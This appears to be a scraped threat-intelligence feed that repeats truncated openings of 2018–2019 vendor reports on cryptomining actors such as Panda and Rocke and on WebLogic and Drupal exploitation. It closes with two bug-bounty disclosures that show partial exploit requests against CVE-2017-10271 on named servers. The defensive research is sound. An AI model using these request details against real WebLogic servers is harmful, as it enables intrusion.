## Executive summary A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again they will update the
Talos
Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”
blogs_talos·2019-09-17
Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”
## Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”
By Christopher Evans and David Liebenberg .
## Executive summary A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as e
Checkpoint
Malware Against the C Monoculture
blogs_checkpoint·2019-05-20
CVE-2017-10271 Malware Against the C Monoculture
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Malware Against the C Monoculture
Research by: Ben Herzog
It’s possible to write any program in any programming language; that’s what Turing completeness means. Therefore, it’s possible t
Fortinet
A Closer Look at Satan Ransomware’s Propagation Techniques
blogs_fortinet·2019-05-20·CVSS 5.3
[MEDIUM] A Closer Look at Satan Ransomware’s Propagation Techniques
FORTIGUARD LABS THREAT RESEARCH
A Closer Look at Satan Ransomware’s Propagation Techniques
By David Maciejak and Floser Bacurio Jr. | May 20, 2019
FortiGuard Labs Breaking Threat Research
Satan ransomware first appeared in early 2017, and since then threat actors have been constantly improving the malware to infect its victims more effectively and to maximize its profits. For instance, FortiGuard Labs has discovered a campaign which was also utilizing a cryptominer malware as an additional payload to maximize its profits from its victims.
Aside from the fact that this file-encrypting malware targets both Linux and Windows platform, it also employs numerous vulnerabilities to propagate itself through public and external networks. In fact, FortiGuard Labs has discovered a new variant t
Unit42
Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
blogs_unit42·2019-05-03·CVSS 9.8
CVE-2019-2725 [CRITICAL] Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
Executive Summary
Unit 42 researchers at Palo Alto Networks have uncovered exploitation activity against an Oracle WebLogic zero-day critical deserialization vulnerability (CVE-2019-2725) that occurred before the release of the out-of-band patch by Oracle on April 26, 2019. Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Once the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released. As a consequence, malicious activity exploiting the vulnerability surged.
According to Zoomeye.org, there are currently over 41,000 publicly accessible WebLogic instances in the wild, shown in Figure 1. In light of the activity we detail he
Unit42
Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
blogs_unit42·2019-05-03·CVSS 9.8
CVE-2019-2725 [CRITICAL] Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
Threat Research Center
Threat Research
Vulnerabilities
## Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
Ken Hsu
Matthew Tennis
Yanhui Jia
Zhibin Zhang
Durgesh Sangvikar
Published: May 3, 2019
Malware
Threat Research
Vulnerabilities
CVE-2019-2725
Exploits
GandCrab
Oracle WebLogic
Sodinokibi
XMRig
Executive Summary
Unit 42 researchers at Palo Alto Networks have uncovered exploitation activity against an Oracle WebLogic zero-day critical deserialization vulnerability ( CVE-2019-2725 ) that occurred before the release of the out-of-band patch by Oracle on April 26, 2019. Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Once the vulnerability was made publ
Unit42
Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
blogs_unit42·2019-04-30·CVSS 7.5
CVE-2019-2725 [HIGH] Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
Threat Research Center
Threat Research
Vulnerabilities
## Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
Cong Zheng
Yanhui Jia
Published: April 30, 2019
Malware
Threat Research
Vulnerabilities
Botnet
Exploit
Linux Malware
Muhstik
WebLogic
Executive Summary
On April 28th, 2019, Unit 42 discovered a new variant of the Linux botnet Muhstik. This new version exploits the latest WebLogic server vulnerability ( CVE-2019-2725 ), just disclosed five days ago, to install itself on vulnerable systems. Oracle released an emergency patch for the vulnerability on April 26, 2019. We have confirmed that the patch successfully protects against this latest version of Muhstik.
From the timeline, we can see that the developer of Muhstik watches
Unit42
Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
blogs_unit42·2019-04-30·CVSS 7.5
CVE-2019-2725 [HIGH] Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
Executive Summary
On April 28th, 2019, Unit 42 discovered a new variant of the Linux botnet Muhstik. This new version exploits the latest WebLogic server vulnerability (CVE-2019-2725), just disclosed five days ago, to install itself on vulnerable systems. Oracle released an emergency patch for the vulnerability on April 26, 2019. We have confirmed that the patch successfully protects against this latest version of Muhstik.
From the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to exploits against them into the botnet. This makes sense because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are pat
Tenable
Oracle WebLogic Affected by Unauthenticated Remote Code Execution Vulnerability (CVE-2019-2725)
blogs_tenable·2019-04-26·CVSS 9.8
[CRITICAL] Oracle WebLogic Affected by Unauthenticated Remote Code Execution Vulnerability (CVE-2019-2725)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters
blogs_talos·2019-02-26·CVSS 8.1
[HIGH] Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters
## Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters
Christopher Evans of Cisco Talos conducted the research for this post.
## EXECUTIVE SUMMARY
Cisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to ma
Talos
Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters
blogs_talos·2019-02-26·CVSS 8.1
[HIGH] Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters
Christopher Evans of Cisco Talos conducted the research for this post.
## EXECUTIVE SUMMARY
Cisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster coul
Checkpoint
SpeakUp: A New Undetected Backdoor Linux Trojan
blogs_checkpoint·2019-02-04
CVE-2018-20062 SpeakUp: A New Undetected Backdoor Linux Trojan
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## SpeakUp: A New Undetected Backdoor Linux Trojan
Check Point Research has discovered a new campaign exploiting Linux servers to implant a new Backdoor Trojan.
Dubbed ‘SpeakUp’, the new Tro
Unit42
Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products
blogs_unit42·2019-01-17·CVSS 7.5
[HIGH] Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products
Palo Alto Networks Unit 42 recently captured and investigated new samples of the Linux coin mining malware used by the Rocke group. The family was suspected to be developed by the Iron cybercrime group and it’s also associated with the Xbash malware we reported on in September of 2018. The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post. The samples described in this report were collected in October of 2018, and since that time the command and control servers they use have been shut down.
During our analysis, we realized that these samples used by the Rocke group adopted new code to uninstall five different cloud security protection and monitoring products from compromised Linux servers. In our analysis,
Unit42
Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products
blogs_unit42·2019-01-17
Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products
Threat Research Center
Threat Research
Malware
## Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products
Xingyu Jin
Claud Xiao
Published: January 17, 2019
Cloud Cybersecurity Research
Malware
Threat Research
Cloud Security
Cloud Workload Protection Platforms
Cryptocurrency
Cryptocurrency mining
Evasion
Iron
Linux
Rocke
Palo Alto Networks Unit 42 recently captured and investigated new samples of the Linux coin mining malware used by the Rocke group. The family was suspected to be developed by the Iron cybercrime group and it’s also associated with the Xbash malware we reported on in September of 2018. The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post . The s
Talos
Rocke: The Champion of Monero Miners
blogs_talos·2018-08-30
Rocke: The Champion of Monero Miners
This post was authored by David Liebenberg.
## SummaryCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor.
In this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors.
## IntroductionTalos has written widely about the issue ofcryptomining malwareand how organizations shouldprotect systemsagainst thi
Talos
Rocke: The Champion of Monero Miners
blogs_talos·2018-08-30
Rocke: The Champion of Monero Miners
## Rocke: The Champion of Monero Miners
This post was authored by David Liebenberg .
## Summary Cryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor.
In this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors.
## Introduction Talos has written widely about the issue of cryptomining malware and how
Trendmicro
Cryptominers Target Patched 2017 Oracle WebLogic Bug
blogs_trendmicro·2018-05-11·CVSS 7.5
CVE-2017-10271 [HIGH] Cryptominers Target Patched 2017 Oracle WebLogic Bug
Exploits & Vulnerabilities
## Cryptominers Target Patched 2017 Oracle WebLogic Bug
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271.
By: Hubert Lin 2018/05/11 Read time: ( words)
Save to Folio
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271 . The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks the sec
Trendmicro
Cryptominers Target Patched 2017 Oracle WebLogic Bug
blogs_trendmicro·2018-05-11·CVSS 7.5
CVE-2017-10271 [HIGH] Cryptominers Target Patched 2017 Oracle WebLogic Bug
Ausnutzung von Schwachstellen
## Cryptominers Target Patched 2017 Oracle WebLogic Bug
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271.
By: Hubert Lin May 11, 2018 Read time: ( words)
Save to Folio
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271 . The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks th
Trendmicro
Cryptominers Target Patched 2017 Oracle WebLogic Bug
blogs_trendmicro·2018-05-11·CVSS 7.5
CVE-2017-10271 [HIGH] Cryptominers Target Patched 2017 Oracle WebLogic Bug
Exploits & Vulnerabilities
# Cryptominers Target Patched 2017 Oracle WebLogic Bug
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271.
By: Hubert Lin
2018/05/11
Read time: ( words)
Save to Folio
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271. The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks the seco
Trendmicro
Cryptominers Target Patched 2017 Oracle WebLogic Bug
blogs_trendmicro·2018-05-11·CVSS 7.5
CVE-2017-10271 [HIGH] Cryptominers Target Patched 2017 Oracle WebLogic Bug
Exploits y vulnerabilidades
## Cryptominers Target Patched 2017 Oracle WebLogic Bug
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271.
By: Hubert Lin May 11, 2018 Read time: ( words)
Save to Folio
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271 . The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks the
Trendmicro
Cryptominers Target Patched 2017 Oracle WebLogic Bug
blogs_trendmicro·2018-05-11·CVSS 7.5
CVE-2017-10271 [HIGH] Cryptominers Target Patched 2017 Oracle WebLogic Bug
Exploits & Vulnerabilities
## Cryptominers Target Patched 2017 Oracle WebLogic Bug
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271.
By: Hubert Lin May 11, 2018 Read time: ( words)
Save to Folio
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it's increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271 . The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks the s
Fortinet
Yet Another Crypto Mining Botnet?
blogs_fortinet·2018-05-03·CVSS 9.8
[CRITICAL] Yet Another Crypto Mining Botnet?
FORTIGUARD LABS THREAT RESEARCH
Yet Another Crypto Mining Botnet?
By David Maciejak | May 03, 2018
In February 2018, several Russian nuclear scientists were arrested for allegedly mining cryptocurrencies using computing resources located at a Russian nuclear warhead facility. Globally, cryptominers are rapidly increasing and spreading for an obvious reason: it’s lucrative. Threat actors are also surfing this wave by using different kind of attacks to compromise not only personal computer but also servers. They are looking for powerful CPU resources to mine cryptocurrencies, such as Monero (XMR), among others, as fast as they can. The more infected machines they can get mining for them, the more money they can make.
Over the last few months we have begun to see a switch away from traditi
Tenable
Critical Oracle WebLogic Server Flaw Still Not Patched
blogs_tenable·2018-05-01
Critical Oracle WebLogic Server Flaw Still Not Patched
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Critical Oracle WebLogic Server Flaw Still Not Patched
blogs_tenable·2018-05-01·CVSS 9.8
CVE-2018-2628 [CRITICAL] Critical Oracle WebLogic Server Flaw Still Not Patched
Blog / Cyber Exposure Alerts
Subscribe
# Critical Oracle WebLogic Server Flaw Still Not Patched
Josef Weiss
May 1, 2018
6 Min Read
One of the many issues that should have been addressed by Oracle’s Critical Patch Update for April 2018 was a fix for a flaw affecting versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 of the Oracle WebLogic Server (WLS) Java Enterprise Edition (EE) application server. This vulnerability, which has been assigned CVE-2018-2628 (CVSS Base Score: 9.8), is a critical issue that can be exploited by an attacker with network access via the T3 protocol. The T3 protocol is used to transport information between WebLogic servers and other types of Java programs. However, the patch was unsuccessful and this issue can still be exploited.
### Impact assessment
With t
Volexity
Drupalgeddon 2: Profiting from Mass Exploitation
blogs_volexity·2018-04-16·CVSS 9.8
CVE-2018-7600 [CRITICAL] Drupalgeddon 2: Profiting from Mass Exploitation
Threat Intelligence
# Drupalgeddon 2: Profiting from Mass Exploitation
April 16, 2018
Matthew Meltzer and Steven Adair
On March 28, 2018, a patch for a highly critical vulnerability, which facilitates remote code execution against the Drupal content management system was released. The vulnerability was identified by Jasper Mattson of Druid and is covered by SA-2018-002 and CVE-2018-7600. Prior to the release of the patch, Drupal had given advanced notice of its impending release and potential consequences tied to the ease of the vulnerability’s exploitation. This sparked concerns of a new “Drupalgeddon”, where a large number of unpatched websites would be compromised. This comes on the heels of a major Drupal vulnerability from October 2014 that was widely exploited by advanced persist
Volexity
Drupalgeddon 2: Profiting from Mass Exploitation
blogs_volexity·2018-04-16·CVSS 9.8
CVE-2018-7600 [CRITICAL] Drupalgeddon 2: Profiting from Mass Exploitation
Threat Intelligence
## Drupalgeddon 2: Profiting from Mass Exploitation
April 16, 2018
Matthew Meltzer and Steven Adair
On March 28, 2018, a patch for a highly critical vulnerability, which facilitates remote code execution against the Drupal content management system was released. The vulnerability was identified by Jasper Mattson of Druid and is covered by SA-2018-002 and CVE-2018-7600 . Prior to the release of the patch, Drupal had given advanced notice of its impending release and potential consequences tied to the ease of the vulnerability’s exploitation. This sparked concerns of a new “Drupalgeddon”, where a large number of unpatched websites would be compromised. This comes on the heels of a major Drupal vulnerability from October 2014 that was widely exploited by advanced persi
Trendmicro
Oracle Server Exploited to Deliver Monero Miners
blogs_trendmicro·2018-02-26·CVSS 7.5
[HIGH] Oracle Server Exploited to Deliver Monero Miners
Cyberbedrohungen
## Oracle Server Exploited to Deliver Monero Miners
The rise of cryptocurrency triggered a shift in the target landscape; there were signs of cryptocurrency miners in October 2017 when mining mobile malware appeared on app stores, and in December 2017 when a miner was spreading through messaging apps.
By: Johnlery Triunfante, Mark Vicente Feb 26, 2018 Read time: ( words)
Save to Folio
Updated on February 28, 2018 3:00PM with the latest DDI rule.
The sudden rise of cryptocurrency triggered a shift in the target landscape . Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomw
Trendmicro
Oracle Server Exploited to Deliver Monero Miners
blogs_trendmicro·2018-02-26·CVSS 7.5
[HIGH] Oracle Server Exploited to Deliver Monero Miners
Cyber Threats
## Oracle Server Exploited to Deliver Monero Miners
The rise of cryptocurrency triggered a shift in the target landscape; there were signs of cryptocurrency miners in October 2017 when mining mobile malware appeared on app stores, and in December 2017 when a miner was spreading through messaging apps.
By: Johnlery Triunfante, Mark Vicente 2018/02/26 Read time: ( words)
Save to Folio
Updated on February 28, 2018 3:00PM with the latest DDI rule.
The sudden rise of cryptocurrency triggered a shift in the target landscape . Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomware a
Trendmicro
Oracle Server Exploited to Deliver Monero Miners
blogs_trendmicro·2018-02-26·CVSS 7.5
[HIGH] Oracle Server Exploited to Deliver Monero Miners
Ciberamenazas
## Oracle Server Exploited to Deliver Monero Miners
The rise of cryptocurrency triggered a shift in the target landscape; there were signs of cryptocurrency miners in October 2017 when mining mobile malware appeared on app stores, and in December 2017 when a miner was spreading through messaging apps.
By: Johnlery Triunfante, Mark Vicente Feb 26, 2018 Read time: ( words)
Save to Folio
Updated on February 28, 2018 3:00PM with the latest DDI rule.
The sudden rise of cryptocurrency triggered a shift in the target landscape . Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomware
Trendmicro
Oracle Server Exploited to Deliver Monero Miners
blogs_trendmicro·2018-02-26·CVSS 7.5
[HIGH] Oracle Server Exploited to Deliver Monero Miners
Cyber Threats
## Oracle Server Exploited to Deliver Monero Miners
The rise of cryptocurrency triggered a shift in the target landscape; there were signs of cryptocurrency miners in October 2017 when mining mobile malware appeared on app stores, and in December 2017 when a miner was spreading through messaging apps.
By: Johnlery Triunfante, Mark Vicente Feb 26, 2018 Read time: ( words)
Save to Folio
Updated on February 28, 2018 3:00PM with the latest DDI rule.
The sudden rise of cryptocurrency triggered a shift in the target landscape . Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomware
Trendmicro
Oracle Server Exploited to Deliver Monero Miners
blogs_trendmicro·2018-02-26·CVSS 7.5
[HIGH] Oracle Server Exploited to Deliver Monero Miners
Cyber Threats
# Oracle Server Exploited to Deliver Monero Miners
The rise of cryptocurrency triggered a shift in the target landscape; there were signs of cryptocurrency miners in October 2017 when mining mobile malware appeared on app stores, and in December 2017 when a miner was spreading through messaging apps.
By: Johnlery Triunfante, Mark Vicente
2018/02/26
Read time: ( words)
Save to Folio
Updated on February 28, 2018 3:00PM with the latest DDI rule.
The sudden rise of cryptocurrency triggered a shift in the target landscape. Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomware au
Talos
Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
blogs_talos·2018-01-31
Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
his post was authored by Nick Biasini, Edmund Brumaghin, Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg.
## Executive Summary
The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks.
This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockc
Talos
Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
blogs_talos·2018-01-31
Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
## Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
his post was authored by Nick Biasini , Edmund Brumaghin , Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg .
## Executive Summary
The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks. This focus on mining isn't
Greynoiseio
Battling Ransomware One Tag At A Time
blogs_greynoiseio
Battling Ransomware One Tag At A Time
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Threat Intel
Rocke (Rocke)
threat_intel·CVSS 7.5
[HIGH] Rocke (Rocke)
# Threat Actor Profile: Rocke
ATT&CK ID: G0106
Also known as: Rocke
Suspected origin: China
## Overview
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "[email protected]" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)
## Techniques (TTPs)
### Initial Access
- T1190 Exploit Public-Facing Application
Usage: Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.(
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
HackerOne
Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]
hackerone·2021-04-25·CVSS 7.5
CVE-2017-10271 [HIGH] Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]
Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]
##Summary
Hello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`.
##Steps To Reproduce
* To reproduce, launch this request with BurpSuite
* This request to the `https://raebilling.mtn.co.za/wls-wsat/CoordinatorPortType` will trigger sleep for 15 seconds (same applies for 20 secondes, 40 seconds):
```
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: raebilling.mtn.co.za
Content-Length: 426
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
40000
```
==**POC:**== {F736913} {F736912} {F736915}
## Suggested Mitigation/Remediation Actions
* Patching WebLogic to the recent version will fix the issue.
##
HackerOne
RCE on █████ via CVE-2017-10271
hackerone·2019-07-01·CVSS 7.5
CVE-2017-10271 [HIGH] RCE on █████ via CVE-2017-10271
RCE on █████ via CVE-2017-10271
**Summary:**
Happy Friday! The server at `██████` is vulnerable to CVE-2017-10271 "Oracle WebLogic Server Remote Command Execution".
**Description:**
The following request takes 12 seconds (12000 milliseconds) to complete:
```
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: ██████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
12000
```
This proves that I have Java code execution on the remote server.
ref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/
Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271
